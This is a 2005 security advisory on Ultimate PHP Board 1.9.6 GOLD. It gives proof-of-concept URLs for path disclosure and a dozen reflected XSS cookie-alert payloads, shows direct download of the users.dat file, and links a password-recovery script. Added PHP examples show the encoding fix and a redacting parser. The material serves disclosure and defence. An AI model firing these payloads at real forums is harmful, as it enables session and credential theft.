M4DR007-06SA (security advisory): Multiple vulnerabilities in UPB 1.9.6 GOLD

Published: 06 16 2005
Released: 06 16 2005
Name: Ultimate PHP Board (UPB)
Affected Systems: <= 1.9.6 GOLD
Issue: Full Path Disclosure, Cross-Site Scripting, Sensitive Information Disclosure
Author: Alberto Trivero
Vendor: http://www.myupb.com/ourscripts_upb.php

Software Description
***********

"UPB is a forum/message board script. It supports threaded discussion with a comprehensive text database system that we wrote here at php outburst for the backend."

Full Path Disclosure
*******

Several scripts use the values of request parameters without checking them. Requesting an id that does not exist makes PHP raise an error, and the error message names the absolute path of the failing script, so a server that displays errors to the client reveals the full installation path. Simple requests like these are enough:

http://www.example.com/upb/viewtopic.php?id=0
http://www.example.com/upb/profile.php?action=get&id=0
http://www.example.com/upb/newpost.php?t_id=0

Cross-Site Scripting (XSS)
*******

Look at the code from login.php at line 69:

<?
...
echo "<form action='login.php?ref=$ref&l=1' method=POST> <center>$skin_tableheading
...
?>

The $ref parameter is controlled by the remote user and UPB does not sanitise its value before echoing it, so a malicious user can inject HTML such as:

'><script>alert(document.cookie)</script>

which turns the generated HTML line into:

<form action='login.php?ref='><script>alert(document.cookie)</script>&l=1' method=POST>

The single quote closes the action attribute and the > closes the tag, so the browser executes the <script>...</script> element, which in this case shows the cookies. This is the PoC URL:

http://www.example.com/upb/login.php?ref=%27%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

Now look at the code from viewtopic.php at line 13:

<?
...
$where = "<b>></b> <a href='viewforum.php?id=$id'>$w_forum[forum]</a> <b>></b> $w_topic[subject]";
...
?>

The $id parameter has the same problem, exploitable with a URL like this:

http://www.example.com/upb/viewtopic.php?id=%27%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

These are PoC URLs for other parameters:

http://www.example.com/upb/viewtopic.php?id=1&t_id=1&page=%27%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://www.example.com/upb/profile.php?action=get&id=%27%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://www.example.com/upb/newpost.php?id=1&t=1&t_id=%27%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://www.example.com/upb/newpost.php?id=%27%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://www.example.com/upb/email.php?id=%27%3E%3Cscript%3Ealert(document.cookies)%3C/script%3E
http://www.example.com/upb/icq.php?action=get&id=%27%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://www.example.com/upb/aol.php?action=get&id=%27%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://www.example.com/upb/getpass.php?ref=%27%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://www.example.com/upb/search.php?step=3&sText=%27%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

Sensitive Information Disclosure
*********

In many cases (always with web servers other than Apache, and sometimes with Apache as well) it is possible to obtain sensitive information about every user registered on the UPB forum by requesting this file directly:

http://www.example.com/upb/db/users.dat

Each line of the file is one user record, with the fields structured in this way:

user_name<~>password<~>level<~>email<~>view_email<~>mail_list<~>location<~>url<~>avatar<~>icq<~>aim<~>msn<~>sig<~>posts<~>date_added<~>id

The users' passwords are stored in encrypted form; to automate recovering them I made a script available at this address:

http://albythebest.altervista.org/upb.pl

Solution
*********

The vendor has been contacted several times, but no patch has been produced yet. Until one is available, administrators can reduce the exposure by disabling display_errors, by encoding every request value with htmlspecialchars() before it is echoed into a page, and by denying web access to the db directory (or moving it outside the document root).
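The following is an added example (the editor's code, not part of UPB or of this advisory). It reproduces the login.php pattern described above, where $ref goes straight from the request into a single-quoted attribute, and puts the hardened construction next to it. The function names and the sample value are this example's own; UPB itself does not contain them.

```php
<?php
// Added example (editor's code, not UPB's). It reproduces the login.php
// pattern from the advisory, where $ref comes straight from the query
// string and is dropped into a single-quoted attribute, and shows the
// output-encoding fix for that context.

/**
 * The vulnerable construction, as in login.php line 69: $ref is
 * interpolated into the attribute with no encoding, so a value that
 * contains ' and > leaves the attribute and then the tag.
 */
function form_vulnerable(string $ref): string
{
    return "<form action='login.php?ref=$ref&l=1' method=POST>";
}

/**
 * The hardened construction. Two contexts need two encodings: the value
 * sits inside a URL query string (percent-encoding, via http_build_query),
 * and that URL sits inside an HTML attribute (htmlspecialchars). ENT_QUOTES
 * matters here: without it the single quote that delimits the attribute
 * is left untouched.
 */
function form_hardened(string $ref): string
{
    $query  = http_build_query(['ref' => $ref, 'l' => 1]);
    $action = htmlspecialchars('login.php?' . $query, ENT_QUOTES, 'UTF-8');
    return "<form action='" . $action . "' method=\"POST\">";
}

// The advisory's payload, as PHP sees it after the web server has
// URL-decoded %27%3E%3Cscript%3E... from the request line.
$ref = "'><script>alert(document.cookie)</script>";

echo "vulnerable: ", form_vulnerable($ref), PHP_EOL;
echo "hardened:   ", form_hardened($ref), PHP_EOL;

// A check a reviewer can run against any value of $ref: the hardened
// markup must never contain a raw <script> tag or a bare attribute quote
// after the one that opens action=.
$hardened = form_hardened($ref);
if (strpos($hardened, '<script') !== false || substr_count($hardened, "'") !== 2) {
    fwrite(STDERR, "hardened output still breaks out of the attribute" . PHP_EOL);
    exit(1);
}
```

The same two-layer encoding applies to $id in viewtopic.php and to every other parameter in the PoC list: however the value reaches the variable, it must be encoded for the context it is written into, and a URL inside an attribute is two contexts, not one.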
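The following is an added example (the editor's code, not part of UPB or of this advisory). It parses records in the db/users.dat layout quoted above, so an administrator can see exactly which fields an unauthenticated download of that file exposes, and prints a redacted view. The two records are constructed for this example and the password field holds a placeholder, not a real UPB hash; the function and constant names are this example's own.

```php
<?php
// Added example (editor's code, not UPB's). Parses records in the
// db/users.dat layout quoted in the advisory and reports which sensitive
// fields each record exposes. The sample records below are constructed for
// this example; HASH_PLACEHOLDER_* stands in for whatever UPB stores.

const UPB_USER_FIELDS = [
    'user_name', 'password', 'level', 'email', 'view_email', 'mail_list',
    'location', 'url', 'avatar', 'icq', 'aim', 'msn', 'sig', 'posts',
    'date_added', 'id',
];

// The fields that matter most to an attacker: the credential, and the
// contact details that let individual users be targeted.
const UPB_SENSITIVE_FIELDS = ['password', 'email', 'icq', 'aim', 'msn'];

/**
 * Split users.dat into one associative array per record. Lines whose field
 * count does not match the layout are reported rather than silently
 * misaligned, because a stray "<~>" inside a signature would shift every
 * later field of that record.
 */
function parse_users_dat(string $data): array
{
    $records = [];
    foreach (preg_split('/\r?\n/', trim($data)) as $lineno => $line) {
        if ($line === '') {
            continue;
        }
        $values = explode('<~>', $line);
        if (count($values) !== count(UPB_USER_FIELDS)) {
            fwrite(STDERR, 'line ' . ($lineno + 1) . ': expected '
                . count(UPB_USER_FIELDS) . ' fields, got ' . count($values) . PHP_EOL);
            continue;
        }
        $records[] = array_combine(UPB_USER_FIELDS, $values);
    }
    return $records;
}

/** Return a copy of a record with the sensitive fields masked. */
function redact(array $record): array
{
    foreach (UPB_SENSITIVE_FIELDS as $field) {
        if ($record[$field] !== '') {
            $record[$field] = '[redacted]';
        }
    }
    return $record;
}

// Constructed sample in the advisory's layout: 16 fields per line, empty
// fields left empty as UPB would for a user who filled in nothing.
$sample = implode(PHP_EOL, [
    "alice<~>HASH_PLACEHOLDER_1<~>3<~>alice@example.com<~>0<~>1<~>Rome<~>http://example.com<~>avatar1.gif<~>12345678<~>alice_aim<~>alice@msn.example<~>Hi there<~>42<~>2005-01-10<~>1",
    "bob<~>HASH_PLACEHOLDER_2<~>1<~>bob@example.com<~>1<~>0<~><~><~><~><~><~><~><~>7<~>2005-03-02<~>2",
]);

foreach (parse_users_dat($sample) as $user) {
    $exposed = array_intersect_key($user, array_flip(UPB_SENSITIVE_FIELDS));
    $nonEmpty = array_keys(array_filter($exposed, 'strlen'));
    echo "user {$user['user_name']} (id {$user['id']}) exposes: "
        . implode(', ', $nonEmpty) . PHP_EOL;
    print_r(redact($user));
}
```

Once the file has been reachable from the web, every password in it should be treated as compromised, since the advisory's script automates recovering them; a redacted copy like the one produced here is what belongs in an incident report, not the raw file.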
Alberto Trivero - trivero@xxxxxxxx
Come cheer us at #security-it on Freenode ( irc.freenode.net )
(C) 2005 Copyright by Madroot Security Group